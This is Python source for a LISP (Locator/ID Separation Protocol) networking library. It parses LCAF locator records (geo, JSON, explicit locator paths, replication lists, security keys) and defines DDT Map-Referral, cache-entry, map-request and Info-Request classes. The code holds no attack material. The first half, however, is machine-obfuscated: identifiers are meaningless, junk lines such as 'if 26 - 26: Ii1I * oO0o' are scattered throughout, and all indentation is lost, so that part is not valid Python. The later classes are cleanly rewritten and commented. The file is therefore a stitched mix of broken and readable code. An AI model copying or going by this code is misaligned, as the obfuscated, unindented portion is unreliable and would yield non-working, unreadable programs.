if 26 - 26: Ii1I * oO0o % I1IiiI - OOooOOo . I1Ii111
iiIi1ii1IiI = lisp_geo ( "" )
packet = iiIi1ii1IiI . decode_geo ( packet , iiii1 , I1iii1IiI11I11I )
if ( packet == None ) : return ( None )
self . geo = iiIi1ii1IiI
if 39 - 39: O0 . OoOoOO00 / I11i * I11i % II111iiii % iIii1I11I1II1
# JSON: 16-bit string length, then the JSON text itself.
elif ( O000oo0O0OO0 == LISP_LCAF_JSON_TYPE ) :
if 76 - 76: II111iiii
if 12 - 12: Oo0Ooo - oO0o . I1ii11iIi11i . iII111i . Ii1I / i1IIi
if 62 - 62: I11i . I1IiiI * i11iIiiIii
if 33 - 33: iIii1I11I1II1 - I1Ii111 % OoO0O00 % i1IIi
O00oO00oOO00O = "H"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( iiii1 < ooOoooOoo0oO ) : return ( None )
if 81 - 81: i1IIi * iII111i % I1ii11iIi11i - I1IiiI * I1Ii111 + OOooOOo
oo0ooOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] ) [ 0 ]
oo0ooOO = socket . ntohs ( oo0ooOO )
if ( iiii1 < ooOoooOoo0oO + oo0ooOO ) : return ( None )
if 66 - 66: Oo0Ooo
packet = packet [ ooOoooOoo0oO : : ]
self . json = lisp_json ( "" , packet [ 0 : oo0ooOO ] )
packet = packet [ oo0ooOO : : ]
if 82 - 82: IiII + OoooooooOO . I11i
# Explicit Locator Path: (flags, afi, address) per hop; nested LCAF
# addresses are rejected.
elif ( O000oo0O0OO0 == LISP_LCAF_ELP_TYPE ) :
if 11 - 11: Ii1I + OoO0O00
if 47 - 47: I11i . i11iIiiIii / II111iiii / IiII
if 53 - 53: i1IIi - Oo0Ooo * O0 * OOooOOo . OoooooooOO
if 99 - 99: oO0o . OoO0O00 / OOooOOo
Ii1111i = lisp_elp ( None )
Ii1111i . elp_nodes = [ ]
while ( iiii1 > 0 ) :
ooOOooooo0Oo , O000oOOoOOO = struct . unpack ( "HH" , packet [ : 4 ] )
if 17 - 17: OoO0O00
O000oOOoOOO = socket . ntohs ( O000oOOoOOO )
if ( O000oOOoOOO == LISP_AFI_LCAF ) : return ( None )
if 69 - 69: O0
Ooo0o0OoOO = lisp_elp_node ( )
Ii1111i . elp_nodes . append ( Ooo0o0OoOO )
if 51 - 51: OoooooooOO - I1ii11iIi11i
ooOOooooo0Oo = socket . ntohs ( ooOOooooo0Oo )
Ooo0o0OoOO . eid = ( ooOOooooo0Oo & 0x4 )
Ooo0o0OoOO . probe = ( ooOOooooo0Oo & 0x2 )
Ooo0o0OoOO . strict = ( ooOOooooo0Oo & 0x1 )
Ooo0o0OoOO . address . afi = O000oOOoOOO
Ooo0o0OoOO . address . mask_len = Ooo0o0OoOO . address . host_mask_len ( )
packet = Ooo0o0OoOO . address . unpack_address ( packet [ 4 : : ] )
iiii1 -= Ooo0o0OoOO . address . addr_length ( ) + 4
if 25 - 25: I1IiiI . OoOoOO00 / iIii1I11I1II1 % i11iIiiIii
Ii1111i . select_elp_node ( )
self . elp = Ii1111i
if 14 - 14: i11iIiiIii + I1IiiI - oO0o - I11i
# Replication List Entry: per-node level + address, optionally
# followed by an AFI=name distinguished name.
elif ( O000oo0O0OO0 == LISP_LCAF_RLE_TYPE ) :
if 38 - 38: I1IiiI / i11iIiiIii
if 99 - 99: Ii1I
if 38 - 38: OoOoOO00 / IiII - I1IiiI % O0 + I1ii11iIi11i
if 51 - 51: i1IIi + II111iiii % oO0o
i1I1Ii11II1i = lisp_rle ( None )
i1I1Ii11II1i . rle_nodes = [ ]
while ( iiii1 > 0 ) :
O0o000 , o00oo0 , IiiiIiii , O000oOOoOOO = struct . unpack ( "HBBH" , packet [ : 6 ] )
if 76 - 76: i1IIi
O000oOOoOOO = socket . ntohs ( O000oOOoOOO )
if ( O000oOOoOOO == LISP_AFI_LCAF ) : return ( None )
if 38 - 38: I1IiiI
iIIII1iiIII = lisp_rle_node ( )
i1I1Ii11II1i . rle_nodes . append ( iIIII1iiIII )
if 15 - 15: o0oOOo0O0Ooo
iIIII1iiIII . level = IiiiIiii
iIIII1iiIII . address . afi = O000oOOoOOO
iIIII1iiIII . address . mask_len = iIIII1iiIII . address . host_mask_len ( )
packet = iIIII1iiIII . address . unpack_address ( packet [ 6 : : ] )
if 55 - 55: i11iIiiIii / OoooooooOO - I11i
iiii1 -= iIIII1iiIII . address . addr_length ( ) + 6
if ( iiii1 >= 2 ) :
O000oOOoOOO = struct . unpack ( "H" , packet [ : 2 ] ) [ 0 ]
if ( socket . ntohs ( O000oOOoOOO ) == LISP_AFI_NAME ) :
packet = packet [ 2 : : ]
packet , iIIII1iiIII . rloc_name = lisp_decode_dist_name ( packet )
if 89 - 89: I11i - i1IIi - i1IIi * OOooOOo - O0
if ( packet == None ) : return ( None )
# Name consumed: string + NUL terminator + 2-byte AFI.
iiii1 -= len ( iIIII1iiIII . rloc_name ) + 1 + 2
if 94 - 94: Oo0Ooo / I11i . I1ii11iIi11i
if 31 - 31: i11iIiiIii + iIii1I11I1II1 . II111iiii
if 72 - 72: I1Ii111 * OoO0O00 + Oo0Ooo / Ii1I % OOooOOo
self . rle = i1I1Ii11II1i
self . rle . build_forwarding_list ( )
if 84 - 84: OoOoOO00 / o0oOOo0O0Ooo
# Security: first probe the cipher suite, then re-decode with the
# right key flavor, read the trailing AFI+address, and reconcile the
# received public key against any stored encap keys.
elif ( O000oo0O0OO0 == LISP_LCAF_SECURITY_TYPE ) :
if 9 - 9: Ii1I
if 76 - 76: I1IiiI % Oo0Ooo / iIii1I11I1II1 - Oo0Ooo
if 34 - 34: OoOoOO00 - i1IIi + OOooOOo + Ii1I . o0oOOo0O0Ooo
if 42 - 42: OoO0O00
if 59 - 59: OoO0O00 . I1Ii111 % OoO0O00
OO0o0 = packet
i1ii1iiI11ii1II1 = lisp_keys ( 1 )
packet = i1ii1iiI11ii1II1 . decode_lcaf ( OO0o0 , iiii1 )
if ( packet == None ) : return ( None )
if 22 - 22: Oo0Ooo
if 21 - 21: o0oOOo0O0Ooo
if 86 - 86: ooOoO0o / iIii1I11I1II1 . OOooOOo
if 93 - 93: Oo0Ooo / II111iiii . Oo0Ooo + i1IIi + i1IIi
# Pick key parameters matching the advertised cipher suite, then
# decode again from the saved packet start with the right flavor.
Iii = [ LISP_CS_25519_CBC , LISP_CS_25519_CHACHA ]
if ( i1ii1iiI11ii1II1 . cipher_suite in Iii ) :
if ( i1ii1iiI11ii1II1 . cipher_suite == LISP_CS_25519_CBC ) :
ii1i1I1111ii = lisp_keys ( 1 , do_poly = False , do_chacha = False )
if 30 - 30: OoOoOO00 . OOooOOo % OOooOOo / II111iiii + i1IIi
if ( i1ii1iiI11ii1II1 . cipher_suite == LISP_CS_25519_CHACHA ) :
ii1i1I1111ii = lisp_keys ( 1 , do_poly = True , do_chacha = True )
if 61 - 61: i1IIi % II111iiii * II111iiii . o0oOOo0O0Ooo / I1ii11iIi11i - I1Ii111
else :
ii1i1I1111ii = lisp_keys ( 1 , do_poly = False , do_chacha = False )
if 93 - 93: Ii1I - i1IIi
packet = ii1i1I1111ii . decode_lcaf ( OO0o0 , iiii1 )
if ( packet == None ) : return ( None )
if 3 - 3: oO0o + OoO0O00 - iII111i / Ii1I
# The keyed locator address follows the security material.
if ( len ( packet ) < 2 ) : return ( None )
O000oOOoOOO = struct . unpack ( "H" , packet [ : 2 ] ) [ 0 ]
self . rloc . afi = socket . ntohs ( O000oOOoOOO )
if ( len ( packet ) < self . rloc . addr_length ( ) ) : return ( None )
packet = self . rloc . unpack_address ( packet [ 2 : : ] )
if ( packet == None ) : return ( None )
self . rloc . mask_len = self . rloc . host_mask_len ( )
if 58 - 58: Ii1I * I11i
if 95 - 95: oO0o
if 49 - 49: I1IiiI
if 23 - 23: I1Ii111
if 5 - 5: I1ii11iIi11i % OoOoOO00 . OoooooooOO . o0oOOo0O0Ooo + i11iIiiIii
if 54 - 54: ooOoO0o - O0 + iII111i
if ( self . rloc . is_null ( ) ) : return ( packet )
if 34 - 34: Ii1I - OOooOOo % iII111i
iIii1iii1 = self . rloc_name
if ( iIii1iii1 ) : iIii1iii1 = blue ( self . rloc_name , False )
if 80 - 80: I11i + o0oOOo0O0Ooo - I1Ii111 . OoO0O00 * oO0o + OOooOOo
if 96 - 96: i1IIi + i1IIi * I1ii11iIi11i . Oo0Ooo * Oo0Ooo
if 82 - 82: iIii1I11I1II1 % oO0o - I1Ii111 / O0 - iII111i
if 22 - 22: oO0o % O0 * I1Ii111 - iIii1I11I1II1 % iII111i / OoOoOO00
if 43 - 43: OOooOOo / Oo0Ooo / iII111i
if 70 - 70: iII111i . oO0o . o0oOOo0O0Ooo
# No stored encap keys: either drop the new keys (peer sent no
# public key) or compute a fresh shared secret.
II1II1iiIiI = self . keys [ 1 ] if self . keys else None
if ( II1II1iiIiI == None ) :
if ( ii1i1I1111ii . remote_public_key == None ) :
iI = bold ( "No remote encap-public-key supplied" , False )
lprint ( " {} for {}" . format ( iI , iIii1iii1 ) )
ii1i1I1111ii = None
else :
iI = bold ( "New encap-keying with new state" , False )
lprint ( " {} for {}" . format ( iI , iIii1iii1 ) )
ii1i1I1111ii . compute_shared_key ( "encap" )
if 27 - 27: iII111i
if 32 - 32: OoOoOO00 . Oo0Ooo . o0oOOo0O0Ooo / I1IiiI
if 23 - 23: iII111i * I1ii11iIi11i / Ii1I - OoOoOO00 . II111iiii
if 74 - 74: I1Ii111 . IiII % iII111i . O0
if 61 - 61: IiII / I11i . I1Ii111 * OoOoOO00 / OoO0O00
if 18 - 18: ooOoO0o % OoO0O00 % OOooOOo . I1ii11iIi11i + II111iiii / iII111i
if 73 - 73: O0 / Ii1I + i11iIiiIii - Ii1I
if 48 - 48: I1IiiI - i11iIiiIii * I1ii11iIi11i
if 70 - 70: I1ii11iIi11i * OoOoOO00
if 63 - 63: ooOoO0o . IiII - OoOoOO00 % IiII - I1Ii111 / I1Ii111
# Stored keys exist: handle unkeying, unchanged keys, or a rekey
# (recompute the shared secret with the new remote public key).
if ( II1II1iiIiI ) :
if ( ii1i1I1111ii . remote_public_key == None ) :
ii1i1I1111ii = None
oo0oO = bold ( "Remote encap-unkeying occurred" , False )
lprint ( " {} for {}" . format ( oo0oO , iIii1iii1 ) )
elif ( II1II1iiIiI . compare_keys ( ii1i1I1111ii ) ) :
ii1i1I1111ii = II1II1iiIiI
lprint ( " Maintain stored encap-keys for {}" . format ( iIii1iii1 ) )
if 42 - 42: i1IIi . OoOoOO00 * OoOoOO00 * OoOoOO00
else :
if ( II1II1iiIiI . remote_public_key == None ) :
iI = "New encap-keying for existing state"
else :
iI = "Remote encap-rekeying"
if 14 - 14: II111iiii / I1Ii111 . I1IiiI
lprint ( " {} for {}" . format ( bold ( iI , False ) ,
iIii1iii1 ) )
II1II1iiIiI . remote_public_key = ii1i1I1111ii . remote_public_key
II1II1iiIiI . compute_shared_key ( "encap" )
ii1i1I1111ii = II1II1iiIiI
if 66 - 66: I1Ii111 % oO0o . iII111i * i1IIi
if 81 - 81: OoooooooOO * I1IiiI / I1Ii111
self . keys = [ None , ii1i1I1111ii , None , None ]
if 10 - 10: I1IiiI - II111iiii / IiII * II111iiii
else :
if 67 - 67: II111iiii . Ii1I % oO0o . Oo0Ooo + IiII
if 10 - 10: OOooOOo - OoO0O00 * oO0o / iIii1I11I1II1 - OoOoOO00
if 20 - 20: IiII % I1IiiI + iIii1I11I1II1 % iII111i
if 100 - 100: o0oOOo0O0Ooo - Oo0Ooo % I1Ii111 . i11iIiiIii % OoooooooOO
# Unknown LCAF type: skip the declared payload length.
packet = packet [ iiii1 : : ]
if 39 - 39: I1ii11iIi11i / i11iIiiIii * i1IIi * Oo0Ooo
return ( packet )
if 39 - 39: OoO0O00 * OoooooooOO / i1IIi + Oo0Ooo
if 57 - 57: O0
def decode ( self , packet , nonce ) :
#
# Decode one RLOC-record: priority/weight fields, the flag word, then
# either an LCAF-encoded locator or a plain AFI+address. Returns the
# remaining bytes, or None when the packet is too short.
#
O00oO00oOO00O = "BBBBHH"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 83 - 83: OOooOOo / Ii1I * I1IiiI % oO0o / iIii1I11I1II1
self . priority , self . weight , self . mpriority , self . mweight , ooOOooooo0Oo , O000oOOoOOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
if 1 - 1: I11i / OoooooooOO / iII111i
if 68 - 68: i1IIi / Oo0Ooo / I11i * Oo0Ooo
ooOOooooo0Oo = socket . ntohs ( ooOOooooo0Oo )
O000oOOoOOO = socket . ntohs ( O000oOOoOOO )
# Flag word: 0x4 local, 0x2 probe, 0x1 reachable (matches encode()).
self . local_bit = True if ( ooOOooooo0Oo & 0x0004 ) else False
self . probe_bit = True if ( ooOOooooo0Oo & 0x0002 ) else False
self . reach_bit = True if ( ooOOooooo0Oo & 0x0001 ) else False
if 91 - 91: OoO0O00 . iII111i
# LCAF keeps its own AFI, so back up 2 bytes to hand decode_lcaf the
# header starting at the AFI field.
if ( O000oOOoOOO == LISP_AFI_LCAF ) :
packet = packet [ ooOoooOoo0oO - 2 : : ]
packet = self . decode_lcaf ( packet , nonce )
else :
self . rloc . afi = O000oOOoOOO
packet = packet [ ooOoooOoo0oO : : ]
packet = self . rloc . unpack_address ( packet )
if 82 - 82: I1ii11iIi11i / Oo0Ooo
self . rloc . mask_len = self . rloc . host_mask_len ( )
return ( packet )
if 63 - 63: I1IiiI
if 3 - 3: iII111i + I1ii11iIi11i
def end_of_rlocs ( self , packet , rloc_count ) :
for IiIIi1IiiIiI in range ( rloc_count ) :
packet = self . decode ( packet , None )
if ( packet == None ) : return ( None )
if 35 - 35: oO0o * iII111i * oO0o * I1Ii111 * IiII * i1IIi
return ( packet )
if 43 - 43: OoO0O00 * I1IiiI / IiII . i11iIiiIii + iII111i + o0oOOo0O0Ooo
if 1 - 1: I1IiiI % o0oOOo0O0Ooo . I1Ii111 + I11i * oO0o
if 41 - 41: OoO0O00 * oO0o - II111iiii
if 2 - 2: IiII + IiII - OoO0O00 * iII111i . oO0o
if 91 - 91: ooOoO0o
if 22 - 22: ooOoO0o % OoO0O00 * OoOoOO00 + Oo0Ooo
if 44 - 44: O0 - I11i
if 43 - 43: O0
if 50 - 50: I11i - OoooooooOO
if 29 - 29: oO0o * oO0o
if 44 - 44: ooOoO0o . I1IiiI * oO0o * Ii1I
if 41 - 41: i1IIi % i11iIiiIii + I11i % OoooooooOO / I1ii11iIi11i
if 8 - 8: OoooooooOO - OoO0O00 / i11iIiiIii / O0 . IiII
if 86 - 86: ooOoO0o * OoooooooOO + iII111i + o0oOOo0O0Ooo
if 79 - 79: i1IIi % I1ii11iIi11i - OoO0O00 % I1ii11iIi11i
if 6 - 6: Oo0Ooo / iII111i . i11iIiiIii
if 8 - 8: I1ii11iIi11i + O0 - oO0o % II111iiii . I1Ii111
if 86 - 86: IiII
if 71 - 71: Ii1I - i1IIi . I1IiiI
if 15 - 15: i1IIi % II111iiii / II111iiii - I1ii11iIi11i - I11i % i1IIi
if 54 - 54: i1IIi . OoO0O00 + iII111i + OoO0O00 * i1IIi
if 13 - 13: Oo0Ooo / OoO0O00 + OOooOOo
if 90 - 90: OoO0O00 * i11iIiiIii / oO0o
if 91 - 91: iII111i - OoOoOO00 / Oo0Ooo % II111iiii / II111iiii / o0oOOo0O0Ooo
if 34 - 34: OoO0O00 * II111iiii + i11iIiiIii % Ii1I
if 25 - 25: OoOoOO00 + IiII . i11iIiiIii
if 87 - 87: I1IiiI + OoooooooOO + O0
if 32 - 32: Ii1I / I1ii11iIi11i . Ii1I
if 65 - 65: IiII
if 74 - 74: Oo0Ooo + i1IIi - II111iiii / ooOoO0o / iII111i
class lisp_map_referral():
    """LISP-DDT Map-Referral message header: a 4-bit type plus record
    count in the first long, followed by a 64-bit nonce."""

    def __init__(self):
        self.record_count = 0
        self.nonce = 0

    def print_map_referral(self):
        """Log a one-line summary of this Map-Referral."""
        lprint("{} -> record-count: {}, nonce: 0x{}".format(
            bold("Map-Referral", False), self.record_count,
            lisp_hex_string(self.nonce)))

    def encode(self):
        """Pack the type/record-count word (network order) and the nonce."""
        first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
        header = struct.pack("I", socket.htonl(first_long))
        return (header + struct.pack("Q", self.nonce))

    def decode(self, packet):
        """Parse the header into record_count and nonce.

        Returns the remaining packet bytes, or None when truncated.
        """
        size = struct.calcsize("I")
        if (len(packet) < size): return (None)

        first_long = socket.ntohl(struct.unpack("I", packet[:size])[0])
        self.record_count = first_long & 0xff
        packet = packet[size::]

        size = struct.calcsize("Q")
        if (len(packet) < size): return (None)

        # Nonce is stored/compared in native order (packed the same way
        # in encode()), so no byte swap here.
        self.nonce = struct.unpack("Q", packet[:size])[0]
        return (packet[size::])
if 10 - 10: I1IiiI % II111iiii / I1IiiI
if 13 - 13: II111iiii - i11iIiiIii
if 90 - 90: I11i . OoOoOO00 % Oo0Ooo / I1Ii111 . Ii1I % OoO0O00
if 32 - 32: I1IiiI + ooOoO0o / O0 * i11iIiiIii % Oo0Ooo + II111iiii
if 95 - 95: iII111i / ooOoO0o + I1Ii111
if 78 - 78: iIii1I11I1II1 / I1IiiI - IiII
if 81 - 81: I1ii11iIi11i
if 31 - 31: O0 % ooOoO0o / I1IiiI * iII111i % iIii1I11I1II1 * OoOoOO00
class lisp_ddt_entry():
    """One DDT cache entry: an (EID, group) prefix and its delegation set."""

    def __init__(self):
        self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.uptime = lisp_get_timestamp()
        self.delegation_set = []
        self.source_cache = None
        self.map_referrals_sent = 0

    def is_auth_prefix(self):
        """An authoritative prefix has no delegations and is not (*, G)."""
        if (len(self.delegation_set) != 0): return (False)
        if (self.is_star_g()): return (False)
        return (True)

    def is_ms_peer_entry(self):
        """True when the first delegation node is a map-server peer."""
        if (len(self.delegation_set) == 0): return (False)
        return (self.delegation_set[0].is_ms_peer())

    def print_referral_type(self):
        """Describe the first delegation node's type, 'unknown' if none."""
        if (len(self.delegation_set) == 0): return ("unknown")
        node = self.delegation_set[0]
        return (node.print_node_type())

    def print_eid_tuple(self):
        return (lisp_print_eid_tuple(self.eid, self.group))

    def add_cache(self):
        """Insert this entry into lisp_ddt_cache.

        Unicast entries are keyed by EID; multicast entries are grouped
        under a (*, G) entry whose source cache holds the sources.
        """
        if (self.group.is_null()):
            lisp_ddt_cache.add_cache(self.eid, self)
        else:
            group_entry = lisp_ddt_cache.lookup_cache(self.group, True)
            if (group_entry == None):
                group_entry = lisp_ddt_entry()
                group_entry.eid.copy_address(self.group)
                group_entry.group.copy_address(self.group)
                lisp_ddt_cache.add_cache(self.group, group_entry)

            # A null source EID means "any source" for this group.
            if (self.eid.is_null()): self.eid.make_default_route(group_entry.group)
            group_entry.add_source_entry(self)

    def add_source_entry(self, source_ddt):
        """Add source_ddt to this (*, G) entry's per-source cache."""
        if (self.source_cache == None): self.source_cache = lisp_cache()
        self.source_cache.add_cache(source_ddt.eid, source_ddt)

    def lookup_source_cache(self, source, exact):
        if (self.source_cache == None): return (None)
        return (self.source_cache.lookup_cache(source, exact))

    def is_star_g(self):
        """True only for a (*, G) entry: group present and EID == group."""
        if (self.group.is_null()): return (False)
        return (self.eid.is_exact_match(self.group))
if 27 - 27: I1IiiI + OoOoOO00 + iII111i
if 70 - 70: I11i + IiII . ooOoO0o - I1ii11iIi11i
if 34 - 34: i1IIi % Oo0Ooo . oO0o
class lisp_ddt_node():
    """A delegation target inside a lisp_ddt_entry's delegation set."""

    def __init__(self):
        self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.public_key = ""
        self.map_server_peer = False
        self.map_server_child = False
        self.priority = 0
        self.weight = 0

    def print_node_type(self):
        # Exactly one of the three predicates below matches for any flag
        # combination, so one of these returns always fires.
        if (self.is_ddt_child()): return ("ddt-child")
        if (self.is_ms_child()): return ("map-server-child")
        if (self.is_ms_peer()): return ("map-server-peer")

    def is_ddt_child(self):
        """A DDT child is neither a map-server child nor a map-server peer."""
        return (not self.map_server_child and not self.map_server_peer)

    def is_ms_child(self):
        return (self.map_server_child)

    def is_ms_peer(self):
        return (self.map_server_peer)
if 67 - 67: OoooooooOO * I11i * Ii1I * iIii1I11I1II1
if 22 - 22: OoO0O00 / o0oOOo0O0Ooo
if 35 - 35: I1Ii111 / I1Ii111 + o0oOOo0O0Ooo - oO0o
if 40 - 40: OoOoOO00 - II111iiii
if 29 - 29: I1IiiI - O0
if 36 - 36: I1IiiI * I1IiiI
if 79 - 79: I1Ii111 - I11i
class lisp_ddt_map_request():
    """State for one Map-Request being resolved through the DDT hierarchy.

    Instances are queued in the module-level lisp_ddt_map_requestQ (keyed
    by nonce) while referrals are chased, and retransmitted on a timer.
    """

    def __init__(self, lisp_sockets, packet, eid, group, nonce):
        self.uptime = lisp_get_timestamp()
        self.lisp_sockets = lisp_sockets
        self.packet = packet                 # original Map-Request payload
        self.eid = eid
        self.group = group
        self.nonce = nonce                   # queue key, matches replies
        self.mr_source = None
        self.sport = 0
        self.itr = None                      # requesting (P)ITR address
        self.retry_count = 0
        self.send_count = 0
        self.retransmit_timer = None
        self.last_request_sent_to = None
        self.from_pitr = False
        self.tried_root = False
        self.last_cached_prefix = [None, None]

    def print_ddt_map_request(self):
        """Log a one-line summary of this queued request."""
        lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format(
            "P" if self.from_pitr else "",
            red(self.itr.print_address(), False),
            green(self.eid.print_address(), False), self.nonce))

    def queue_map_request(self):
        """Start the retransmit timer and register this request by nonce."""
        self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
            lisp_retransmit_ddt_map_request, [self])
        self.retransmit_timer.start()
        lisp_ddt_map_requestQ[str(self.nonce)] = self

    def dequeue_map_request(self):
        """Cancel the retransmit timer and drop the queue entry, if any."""
        self.retransmit_timer.cancel()
        # Fixed: dict.has_key() is Python-2-only (removed in Python 3);
        # the `in` membership test behaves identically on both.
        if (str(self.nonce) in lisp_ddt_map_requestQ):
            lisp_ddt_map_requestQ.pop(str(self.nonce))

    def print_eid_tuple(self):
        return (lisp_print_eid_tuple(self.eid, self.group))
if 11 - 11: OoO0O00 / i1IIi . OoooooooOO
if 40 - 40: IiII + iII111i * I11i + OoOoOO00
if 5 - 5: I1Ii111 / IiII
if 30 - 30: OOooOOo . iII111i % OoO0O00 + oO0o
if 69 - 69: i11iIiiIii + IiII * ooOoO0o * iII111i % oO0o
if 66 - 66: OOooOOo * IiII + O0 - OoooooooOO
if 19 - 19: Oo0Ooo * OoOoOO00
if 52 - 52: OoO0O00 + oO0o
if 84 - 84: O0 % I1ii11iIi11i % iIii1I11I1II1 - OoOoOO00 - Oo0Ooo
if 7 - 7: II111iiii % oO0o % i1IIi . iIii1I11I1II1
if 92 - 92: Ii1I / o0oOOo0O0Ooo % OOooOOo - OoOoOO00
if 44 - 44: I1IiiI + OoOoOO00 * Oo0Ooo
if 31 - 31: I11i - I1IiiI - OoO0O00 * OoOoOO00
if 50 - 50: I1ii11iIi11i + I11i * iII111i
if 27 - 27: OoOoOO00 * OOooOOo * iIii1I11I1II1 / i1IIi
if 60 - 60: OOooOOo * I1Ii111 . oO0o
if 47 - 47: oO0o % OOooOOo / OOooOOo % OoOoOO00 % I1Ii111 / OoOoOO00
if 51 - 51: I1IiiI . I11i - OoOoOO00
if 10 - 10: Oo0Ooo * OOooOOo / IiII . o0oOOo0O0Ooo
if 97 - 97: Ii1I . Ii1I % iII111i
# Map-Referral action codes.  The two negative values are internal-only
# sentinels and never appear on the wire.
LISP_DDT_ACTION_SITE_NOT_FOUND = - 2
LISP_DDT_ACTION_NULL = - 1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
if 49 - 49: Oo0Ooo % OOooOOo - OoooooooOO + IiII
# Printable names indexed by the non-negative action values 0..5 only;
# the negative internal actions have no entry in this table.
lisp_map_referral_action_string = [
 "node-referral" , "ms-referral" , "ms-ack" , "ms-not-registered" ,
 "delegation-hole" , "not-authoritative" ]
if 54 - 54: iIii1I11I1II1 - OoooooooOO / I11i / oO0o % I1IiiI + OoOoOO00
if 26 - 26: OoO0O00 * II111iiii % OOooOOo * iII111i + iII111i
if 25 - 25: I11i - I1ii11iIi11i
if 100 - 100: I1Ii111 / Ii1I + OoOoOO00 . OoooooooOO
if 83 - 83: O0
if 35 - 35: i11iIiiIii - I11i . OoOoOO00 * II111iiii % i11iIiiIii
if 55 - 55: o0oOOo0O0Ooo / O0 / OoooooooOO * Oo0Ooo % iII111i
if 24 - 24: I1ii11iIi11i % OOooOOo + OoooooooOO + OoO0O00
if 100 - 100: Oo0Ooo % OoO0O00 - OoOoOO00
if 46 - 46: o0oOOo0O0Ooo
if 28 - 28: i1IIi
if 81 - 81: oO0o % OoooooooOO . I1Ii111 - OoOoOO00 / I1IiiI
if 62 - 62: I1Ii111 * I11i / I11i
if 42 - 42: ooOoO0o * ooOoO0o / Ii1I / OOooOOo * OOooOOo
if 92 - 92: Oo0Ooo / iII111i - OoooooooOO - o0oOOo0O0Ooo % ooOoO0o
if 35 - 35: i1IIi % iII111i % I11i * iIii1I11I1II1 % Ii1I - Oo0Ooo
if 94 - 94: iII111i
if 68 - 68: OoooooooOO % OOooOOo / OoooooooOO / I1Ii111 + Ii1I - o0oOOo0O0Ooo
if 81 - 81: I1IiiI
if 62 - 62: Ii1I * OoOoOO00
if 27 - 27: Oo0Ooo + Oo0Ooo / II111iiii % I1Ii111
if 11 - 11: Ii1I
if 54 - 54: I1IiiI * I1Ii111 / ooOoO0o / iIii1I11I1II1 % iII111i / oO0o
if 11 - 11: ooOoO0o + I1IiiI + Ii1I . II111iiii
if 50 - 50: Oo0Ooo
if 14 - 14: O0
if 67 - 67: II111iiii / O0
if 10 - 10: i1IIi / Oo0Ooo
if 20 - 20: Oo0Ooo * I1Ii111 / I1ii11iIi11i . ooOoO0o
if 67 - 67: o0oOOo0O0Ooo . Oo0Ooo % I11i
if 38 - 38: OOooOOo - OoO0O00 . ooOoO0o
if 50 - 50: o0oOOo0O0Ooo
if 85 - 85: II111iiii . iII111i - i1IIi
if 23 - 23: iII111i . Ii1I - OoO0O00 / I1ii11iIi11i / O0
if 4 - 4: i1IIi % Oo0Ooo % Ii1I * ooOoO0o - I11i
if 76 - 76: iIii1I11I1II1 / ooOoO0o % I1ii11iIi11i % OOooOOo
if 13 - 13: IiII
if 56 - 56: Oo0Ooo
if 55 - 55: i11iIiiIii + iIii1I11I1II1 / i1IIi / I1ii11iIi11i
if 64 - 64: IiII . OoO0O00 * i11iIiiIii
if 18 - 18: Ii1I % o0oOOo0O0Ooo - Oo0Ooo
if 28 - 28: IiII
if 93 - 93: Oo0Ooo % i1IIi
if 51 - 51: oO0o % O0
if 41 - 41: I1IiiI * I1IiiI . I1Ii111
if 38 - 38: I1IiiI % i11iIiiIii
if 17 - 17: i11iIiiIii
if 81 - 81: I1Ii111
if 25 - 25: I1IiiI
if 52 - 52: I1ii11iIi11i % i1IIi . IiII % OoOoOO00
if 50 - 50: OOooOOo * I1IiiI / o0oOOo0O0Ooo
if 91 - 91: iIii1I11I1II1 / OOooOOo * O0 . o0oOOo0O0Ooo + oO0o / I1ii11iIi11i
if 33 - 33: II111iiii + Ii1I
class lisp_info ( ) :
    """LISP Info-Request / Info-Reply message (NAT-traversal support).

    An Info-Request carries a nonce plus the sender's hostname; an
    Info-Reply additionally carries the NAT LCAF with translated ports,
    the ETR's global/private RLOCs, the map-server RLOC, and an RTR list.
    """
    def __init__ ( self ) :
        self . info_reply = False   # False = Info-Request, True = Info-Reply
        self . nonce = 0
        self . private_etr_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
        self . global_etr_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
        self . global_ms_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
        self . ms_port = 0           # NAT-translated map-server port
        self . etr_port = 0          # NAT-translated ETR port
        self . rtr_list = [ ]
        self . hostname = lisp_hostname
    if 46 - 46: IiII + O0 + i1IIi + ooOoO0o / iII111i
    if 94 - 94: oO0o + iII111i * OoOoOO00 - i1IIi / OoooooooOO
    def print_info ( self ) :
        """Log a one-line summary of this Info-Request/Info-Reply."""
        if ( self . info_reply ) :
            o0o0O00O0oo = "Info-Reply"
            oOo00O = ( ", ms-port: {}, etr-port: {}, global-rloc: {}, " + "ms-rloc: {}, private-rloc: {}, RTR-list: " ) . format ( self . ms_port , self . etr_port ,
                red ( self . global_etr_rloc . print_address_no_iid ( ) , False ) ,
                red ( self . global_ms_rloc . print_address_no_iid ( ) , False ) ,
                red ( self . private_etr_rloc . print_address_no_iid ( ) , False ) )
            if ( len ( self . rtr_list ) == 0 ) : oOo00O += "empty, "
            for ooOoOo0O in self . rtr_list :
                oOo00O += red ( ooOoOo0O . print_address_no_iid ( ) , False ) + ", "
            if 47 - 47: OoooooooOO % I1ii11iIi11i + I1IiiI / I1Ii111
            # Strip the trailing ", " left by the loop (or by "empty, ").
            oOo00O = oOo00O [ 0 : - 2 ]
        else :
            o0o0O00O0oo = "Info-Request"
